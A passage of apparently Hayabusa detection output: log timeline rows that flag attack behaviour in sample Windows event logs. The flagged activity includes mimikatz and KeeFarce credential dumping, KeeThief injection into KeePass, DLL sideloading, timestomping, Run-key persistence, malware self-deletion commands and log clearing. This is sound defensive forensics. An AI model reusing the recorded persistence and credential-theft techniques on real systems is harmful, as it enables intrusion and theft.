Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:49.961 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\wlanapi.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1624 | PGUID: 365ABB72-AB28-5CB8-0000-001025060100 | Hash: SHA1=31E713AFCF973171D9A3B0B616F4726CD3CFE621,MD5=837E870DBDEE3D19122C833389D81CC9,SHA256=4C4410B103A80D9502E6842033BBDA2952C219824DCCA75EEB8265C94A53FBC4,IMPHASH=6C6D0BFAB9C996952B5E81BA61DB929E",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:03:03.321 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:03:03.441 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\HTools (vboxsrv) (D).lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-28 00:57:25.868 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Flash_update.exe | Process: C:\Windows\Explorer.EXE | PID: 2772 | PGUID: 365ABB72-7ACC-5CC4-0000-0010B2470300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:27.087 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 944 | PGUID: 365ABB72-7AB0-5CC4-0000-0010C5BE0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Users\IEUser\Downloads\Flash_update.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf4be | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=B4E581F173F782A2F1DA5D29C95946EE500EB2D0,MD5=42893ADBC36605EC79B5BD610759947E,SHA256=1A061C74619DE6AF8C02CBA0FA00754BDD9E3515C0E08CAD6350C7ADFC8CDD5B,IMPHASH=40BEC1A4A3BCB7D3089B5E1532386613",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.587 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.650 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.650 +09:00,IEWIN7,2,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll.url | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-05 17:50:28.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.650 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=4E14894860034FEFBAB41CFE9A763D8061D19EF9,MD5=2D8FB1F82724CF542CD2E3A5E041FB52,SHA256=ECE29E4AF4B33C02DAFAC24748A9C125B057E39455ACF3C45464DB36BFE74881,IMPHASH=9599F61759CDFD742AFA0B8EC24B5599",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1060,technique_name=Registry Run Keys / Start Folder | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Run\360v: C:\Users\IEUser\AppData\Roaming\svchost.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.931 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2992 | Src PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Tgt PID: 3076 | Tgt PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /A | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | LID: 0xf4be | PID: 3076 | PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 3188 | PGUID: 365ABB72-7C02-5CC4-0000-0010FD6E0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:54.165 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: KeeFarce.exe | Process: C:\Users\Public\KeeFarce.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xffa8 | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx 2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx 2019-04-28 03:47:00.062 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\Public\KeeFarce.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 1288 | Src PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx 2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2364 | PGUID: 365ABB72-A201-5CC4-0000-00104F500800 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx 2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Users\Public\KeeFarce.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx 2019-04-28 03:47:00.124 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\Public\KeeFarce.exe | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx 2019-04-28 03:55:04.710 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx 2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx 2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx 2019-04-28 03:55:04.980 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx 2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx 2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx 2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx 2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,Evas,System Log File Cleared,User: jwrig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx 2019-04-28 06:04:32.373 +09:00,DESKTOP-JR78RLP,7040,medium,Evas,Event Log Service Startup Type Changed To Disabled,Old Setting: auto start | New Setting: disabled,../hayabusa-rules/hayabusa/default/alerts/System/7040_EventLogServiceStartupDisabled.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx 2019-04-29 01:29:42.988 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x800 | Src PID: 860 | Src PGUID: 365ABB72-D3C2-5CC5-0000-0010D9790500 | Tgt PID: 748 | Tgt PGUID: 365ABB72-D3E8-5CC5-0000-0010E7D30500,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx 2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx 2019-04-30 05:59:14.447 +09:00,IEWIN7,18,info,,Pipe Connected,\46a676ab7f179e511e30dd2dc41bd388 | Process: System | PID: 4 | PGUID: 